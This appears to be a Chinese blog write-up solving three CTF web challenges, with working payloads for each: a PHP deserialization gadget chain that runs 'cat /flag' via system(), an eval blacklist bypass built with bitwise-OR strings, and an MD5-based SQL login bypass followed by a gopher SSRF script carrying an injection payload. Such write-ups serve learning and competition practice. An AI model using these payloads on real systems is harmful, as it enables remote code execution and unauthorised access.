easy_seri

开局源码

第一关

具体代码是啥我忘了,但是主要思路就是用静态方法调用的形式动态调用对象的函数

payload

?a=s:13:"Test::getHint;"

然后拿到第二关的源码

<?php
class Fake{
    public $firm;
    public $test;
    public function __set($firm,$test){
    $test = "No,You can't";
    $firm = unserialize($firm);
    call_user_func($firm,$test);
  }
}
class Temp{
    public $pri;
    public $fin=1;
    public function __destruct()
    {
        $a=$this->action;
       $this->pri->$a = $this->fin;
    }

}

class OwO{
    public $fc;
    public $args;   
    function run()
    {

        return ($this->fc)($this->args);

    }
}
$d = $_GET['poc'];
unserialize($d);

可以知道利用链是Temp -> Fake -> OwO

最后的一步执行自定义函数是通过查手册发现的利用方式

意思是把new一个OwO类,两个属性赋值后赋值作为数组成员然后序列化输出,赋值给action

构造利用方法

<?php
class Fake{
    public $firm;
    public $test;
}
class Temp{
    public $pri;
    public $fin=1;
}

class OwO{
    public $fc;
    public $args;   
}
$d = $_GET['poc'];
unserialize($d);
$a=new Temp(); 
$b=new Fake(); 
$c=new OwO(); 
$a->pri=$b; 
$c->fc='system'; 
$c->args='cat /flag'; 
$arr=array($c,'run');
$a->action=serialize($arr); 
echo serialize($a);

payload

O:4:"Temp":3:{s:3:"pri";O:4:"Fake":2:{s:4:"firm";N;s:4:"test";N;}s:3:"fin";i:1;s:6:"action";s:87:"a:2:{i:0;O:3:"OwO":2:{s:2:"fc";s:6:"system";s:4:"args";s:9:"cat /flag";}i:1;s:3:"run";}";}

flag

flag{ac1419bcb613a4e40dea12acfb9ba644}

magicchar

<?php
error_reporting(0);
include'flag.php';
function Magic($str){

  for($i=0; $i<=strlen($str)-1; $i++) {

    if ((ord($str[$i])<32) or (ord($str[$i])>126)) {
      die('sorry');
      exit;
    }

  }

  $blklst = ['[A-VX-Za-z]',' ','\t','\r','\n','\'','""','`','\[','\]','\$','\\','\^','~'];
  foreach ($blklst as $blkitem) {
    if (preg_match('/' . $blkitem . '/m', $str)) {
      die('out');
      exit;
    }
  }
}
if(!isset($_GET['yell'])) {
  show_source(__FILE__);
} else {
  $str = $_GET['yell'];
  Magic($str);
  ob_start();
  $res = eval("echo " . $str . ";");
  $out = ob_get_contents();
  ob_end_clean();
  if ($out === "Wa4nn") {
      echo $flag;
  } else {
    echo htmlspecialchars($out, ENT_QUOTES);
  }
}
?>

没有过滤 | 可以用或运算来构造payload

用php来构造出可用的或运算

<?php
error_reporting(0);
include'flag.php';
function Magic($str){

  for($i=0; $i<=strlen($str)-1; $i++) {

    if ((ord($str[$i])<32) or (ord($str[$i])>126)) {
      return 'sorry';
    }

  }

  $blklst = ['[A-VX-Za-z]',' ','\t','\r','\n','\'','""','`','\[','\]','\$','\\','\^','~'];
  foreach ($blklst as $blkitem) {
    if (preg_match('/' . $blkitem . '/m', $str)) {
      return 'out';

    }
  }
}

$str1 = '';
$str2 = '';

for($j=32;$j<127;$j++){
    $str1 = chr($j);
    if(Magic($str1) === 'out' || Magic($str1) === 'sorry'){
        continue;
    }
    for($k=32;$k<127;$k++){
        $str2 = chr($k);
        if(Magic($str2) === 'out' || Magic($str2) === 'sorry'){
        continue;
    }
    echo $str1|$str2.$str1.$str2;

        echo('<br>');
    }
}

生成的每行顺序是生成的字符,第一个字符第二个字符

最后手工一个字符一个字符拼接

得到W@0@@W!4..可以生成Wa4nn

所以payload

?yell="W@0@@"|"W!4.."

最后flag

flag{2e8650336723cba98e81fce4031b88d2}

really_admin

index.php尝试注入无果,发现admin.php但302重定向。然后就是各种尝试无果一直等hint

hint:Do you like MD5?

md5登录想到md5和mysql的一个考点,参数md5之后放进去数据库查询,一共有两个字符串ffifdyop129581926211651571912466741651878684928,第一个回显hack,第二个登录成功

payload

?username=1&password=129581926211651571912466741651878684928

里面的界面就是gopher发包,想到之前ctf有一道类似的题目

找到脚本,改一下发现可以直接用

import urllib.parseimport binasciidef str_to_hexStr(string):    str_bin = string.encode('utf-8')    return binascii.hexlify(str_bin).decode('utf-8')        payload='''POST /admin.php HTTP/1.1Host: 127.0.0.1Content-Type: application/x-www-form-urlencodedContent-Length: {}username=admin&password=5fb4e07de914cfc82afb44vbaf402203'''#username=-1';set@x=0x73656C656374202A2066726F6D20607265616C5F61646D696E5F686572655F646F5F796F755F66696E6460;prepare a from @x;execute a;#&password=adminpayload.format(len(payload.split('\n')[-1]))#username=-1'&password=adminpayload=str_to_hexStr(payload.format(len(payload.split('username')[1])+8))length = len(payload)urlencodeData = ''for l in range(0, length, 2):    urlencodeData += '%'    urlencodeData += payload[l]    urlencodeData += payload[l + 1]print('ssrf.php?way=gopher://127.0.0.1:80/_'+ urllib.parse.quote(urlencodeData))

原题,但是由于忘记了哪场比赛没有找到保存的pdf。。

然后一人找一人继续尝试,发现rename被ban了之前的wp用不了,但是后面终于找到本地的原题wp。2021虎符“慢慢做”管理系统

最后发现admin密码没有改,可以直接用之前wp的admin密码

username=admin&password=5fb4e07de914cfc82afb44vbaf402203

登录之后重定向到flag.php,cookietin3hia48hn31gmp50h2u96i95

访问后拿到flag

flag{59d1708270cba9c6aff1474285817cf4}
说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...